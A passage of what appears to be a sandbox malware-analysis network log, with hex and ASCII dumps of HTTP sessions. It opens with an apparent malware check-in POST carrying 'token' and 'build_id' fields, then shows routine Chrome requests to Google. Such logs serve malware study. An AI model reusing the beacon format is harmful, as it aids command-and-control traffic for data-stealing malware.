2025-01-05 19:08:05 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 39 38 38 33 37 62 61 34 62 37 62 39 30 34 65 64 31 34 31 37 35 64 64 30 32 35 65 32 64 31 0d 0a 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 32 62 34 30 39 37 38 64 31 33 38 65 30 38 31 61 62 38 36 36 32 61 39 64 31 65 37 37 30 66 34 0d 0a 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 Data Ascii: ------XT2DBS0R1N7YUA1DB1NYContent-Disposition: form-data; name="token"0698837ba4b7b904ed14175dd025e2d1------XT2DBS0R1N7YUA1DB1NYContent-Disposition: form-data; name="build_id"52b40978d138e081ab8662a9d1e770f4------XT2DBS0R1N7YUA1DB1NYCont
2025-01-05 19:08:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 05 Jan 2025 19:08:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-05 19:08:06 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49754	142.250.186.68	443	7644	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:08:08 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-05 19:08:08 UTC	1266	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:08:08 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-FmlI1ehqUiPWtYKnqpwh5w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-05 19:08:08 UTC	124	IN	Data Raw: 39 31 34 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 69 72 73 20 61 63 63 65 70 74 69 6e 67 20 74 61 78 20 72 65 74 75 72 6e 73 22 2c 22 6d 6f 75 6e 74 20 75 6e 69 6f 6e 20 66 6f 6f 74 62 61 6c 6c 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 22 2c 22 70 6c 61 6e 65 74 73 20 61 6c 69 67 6e 6d 65 6e 74 22 2c 22 6e 79 74 20 6d 69 6e 69 20 63 72 6f 73 73 77 6f 72 64 20 Data Ascii: 914)]}'["",["irs accepting tax returns","mount union football","nintendo switch","planets alignment","nyt mini crossword
2025-01-05 19:08:08 UTC	1390	IN	Data Raw: 63 6c 75 65 73 22 2c 22 73 6e 6f 77 20 73 74 6f 72 6d 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 2c 22 70 73 20 70 6c 75 73 20 67 61 6d 65 73 22 2c 22 6e 66 6c 20 69 6e 61 63 74 69 76 65 73 20 77 65 65 6b 20 31 38 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 6c 22 3a 5b 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c Data Ascii: clues","snow storm weather forecast","ps plus games","nfl inactives week 18"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},
2025-01-05 19:08:08 UTC	817	IN	Data Raw: 6b 78 49 57 47 35 79 65 56 4a 55 4e 55 74 7a 54 55 56 6d 4f 54 59 34 5a 33 67 32 59 58 70 61 63 31 49 78 63 54 68 72 4d 47 35 4c 63 58 56 45 5a 32 4d 32 59 6a 41 33 52 7a 6c 6a 65 54 59 77 4d 48 52 71 59 6d 52 76 62 58 4e 54 64 6b 78 4c 4f 55 5a 54 65 6e 6c 4e 56 31 70 32 5a 6d 5a 31 56 47 38 30 4c 30 35 76 4d 6b 6c 75 62 6d 64 35 63 6e 68 6f 61 6b 68 4a 55 47 52 73 61 57 4e 6a 61 6a 68 4d 53 31 4e 4f 52 45 70 59 62 58 45 33 5a 48 52 4e 52 6e 46 48 55 30 64 68 54 32 6c 76 5a 55 39 53 55 33 4a 4c 5a 58 51 72 51 30 51 79 4d 56 42 6c 64 56 4e 4f 64 55 35 55 59 58 49 32 55 45 68 47 57 58 46 52 54 6e 51 78 62 56 46 6b 53 32 56 61 4e 56 4e 43 62 79 74 76 4f 47 52 4d 53 45 67 30 56 33 67 79 51 6b 39 7a 4d 57 5a 46 53 32 56 49 57 44 68 31 62 57 4e 73 61 58 52 4c Data Ascii: kxIWG5yeVJUNUtzTUVmOTY4Z3g2YXpac1IxcThrMG5LcXVEZ2M2YjA3RzljeTYwMHRqYmRvbXNTdkxLOUZTenlNV1p2ZmZ1VG80L05vMklubmd5cnhoakhJUGRsaWNjajhMS1NOREpYbXE3ZHRNRnFHU0dhT2lvZU9SU3JLZXQrQ0QyMVBldVNOdU5UYXI2UEhGWXFRTnQxbVFkS2VaNVNCbytvOGRMSEg0V3gyQk9zMWZFS2VIWDh1bWNsaXRL
2025-01-05 19:08:08 UTC	92	IN	Data Raw: 35 36 0d 0a 4b 33 56 74 64 54 4a 48 63 46 63 7a 53 33 42 5a 62 44 4e 69 59 57 68 49 52 6b 39 71 64 56 4a 6c 61 6b 70 42 52 45 46 75 61 6b 39 6f 5a 6e 64 77 64 6d 4e 71 56 48 4e 31 65 6c 64 54 57 55 67 32 57 6b 31 34 61 6a 4e 55 5a 30 68 49 55 44 42 4a 4c 31 68 52 64 6a 0d 0a Data Ascii: 56K3VtdTJHcFczS3BZbDNiYWhIRk9qdVJlakpBREFuak9oZndwdmNqVHN1eldTWUg2Wk14ajNUZ0hIUDBJL1hRdj
2025-01-05 19:08:08 UTC	1223	IN	Data Raw: 34 63 30 0d 0a 52 52 4d 7a 52 58 61 33 4a 49 57 58 4a 4a 62 57 74 52 63 33 46 74 54 57 4e 6e 57 58 6c 6a 4f 58 5a 56 5a 58 5a 79 63 47 52 68 52 6d 70 51 64 6e 70 45 56 55 31 46 62 58 52 69 57 58 70 6d 64 79 74 31 51 55 39 42 62 58 4a 54 4e 48 64 42 51 6a 4d 33 4e 6b 73 7a 57 47 31 77 56 33 42 4c 64 47 31 47 62 30 70 76 56 44 42 32 52 33 64 33 56 6c 42 33 4d 45 46 4a 4d 56 4e 32 51 55 55 32 54 32 39 54 54 6d 74 6a 4e 6c 6f 72 53 45 6b 77 62 6a 68 52 4e 31 68 49 53 58 64 58 55 44 4a 31 53 6d 31 4d 5a 47 64 76 57 55 55 31 4c 30 6c 68 56 55 74 33 65 44 4d 78 55 46 56 31 65 6a 42 79 53 31 64 68 59 7a 68 72 52 54 68 61 53 6c 4e 54 54 6e 4e 4e 64 56 4a 71 5a 79 39 35 53 6a 41 78 4d 48 6c 49 63 45 38 72 64 48 56 4f 52 6a 56 51 59 6b 64 31 55 6c 46 73 56 32 35 71 Data Ascii: 4c0RRMzRXa3JIWXJJbWtRc3FtTWNnWXljOXZVZXZycGRhRmpQdnpEVU1FbXRiWXpmdyt1QU9BbXJTNHdBQjM3NkszWG1wV3BLdG1Gb0pvVDB2R3d3VlB3MEFJMVN2QUU2T29TTmtjNlorSEkwbjhRN1hISXdXUDJ1Sm1MZGdvWUU1L0lhVUt3eDMxUFV1ejByS1dhYzhrRThaSlNTTnNNdVJqZy95SjAxMHlIcE8rdHVORjVQYkd1UlFsV25q
2025-01-05 19:08:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49755	142.250.186.68	443	7644	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:08:08 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-05 19:08:08 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 05 Jan 2025 19:08:08 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-05 19:08:08 UTC	372	IN	Data Raw: 31 61 31 32 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 1a12)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2025-01-05 19:08:08 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2025-01-05 19:08:08 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2025-01-05 19:08:08 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2025-01-05 19:08:08 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2025-01-05 19:08:08 UTC	750	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 34 2c 33 37 30 30 39 34 32 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700304,3700942,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){va
2025-01-05 19:08:08 UTC	398	IN	Data Raw: 31 38 37 0d 0a 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 78 64 28 5f 2e 67 64 2c 79 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 41 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 21 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 75 6e 64 65 66 69 6e 65 64 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 5c 75 30 30 32 36 5c 75 30 30 32 36 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 Data Ascii: 187d\u0026\u0026_.xd(_.gd,yd,\"click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Ad\u003dtypeof AsyncContext!\u003d\u003d\"undefined\"\u0026\u0026typeof AsyncContext.Snapshot\u003d\u003d\u003d\"function\"?a\u003d\u003ea\u0026\u0026AsyncContext.Snapshot
2025-01-05 19:08:08 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 6e 20 61 2e 69 5b 62 5d 3b 74 68 72 6f 77 20 6e 65 77 20 42 64 3b 7d 3b 5f 2e 44 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 43 64 28 5f 2e 68 64 2e 69 28 29 2c 61 29 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 2f 2a 5c 6e 5c 6e 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 5c 6e 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 47 64 3b 5f 2e 45 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e Data Ascii: 8000n a.i[b];throw new Bd;};_.Dd\u003dfunction(a){return _.Cd(_.hd.i(),a)};\n}catch(e){_._DumpException(e)}\ntry{\n/\n\n Copyright Google LLC\n SPDX-License-Identifier: Apache-2.0\n/\nvar Gd;_.Ed\u003dfunction(a){const b\u003da.length;if(b\u003e0){con
2025-01-05 19:08:08 UTC	1390	IN	Data Raw: 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 52 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 5c 75 30 30 32 36 5c 75 30 30 32 36 28 52 64 5c 75 30 30 33 64 51 64 28 29 29 3b 72 65 74 75 72 6e 20 52 64 7d 3b 5c 6e 5f 2e 55 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 53 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 54 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 56 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 54 64 29 72 65 Data Ascii: eateScriptURL:b})}catch(b){}return a};_.Sd\u003dfunction(){Rd\u003d\u003d\u003dvoid 0\u0026\u0026(Rd\u003dQd());return Rd};\n_.Ud\u003dfunction(a){const b\u003d_.Sd();return new _.Td(b?b.createScriptURL(a):a)};_.Vd\u003dfunction(a){if(a instanceof _.Td)re
2025-01-05 19:08:08 UTC	1390	IN	Data Raw: 65 28 5f 2e 67 65 28 61 29 29 3a 64 65 7c 7c 28 64 65 5c 75 30 30 33 64 6e 65 77 20 66 65 29 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 Data Ascii: e(_.ge(a)):de\|\|(de\u003dnew fe)};_.ie\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db\|\|document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49756	142.250.186.68	443	7644	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:08:08 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
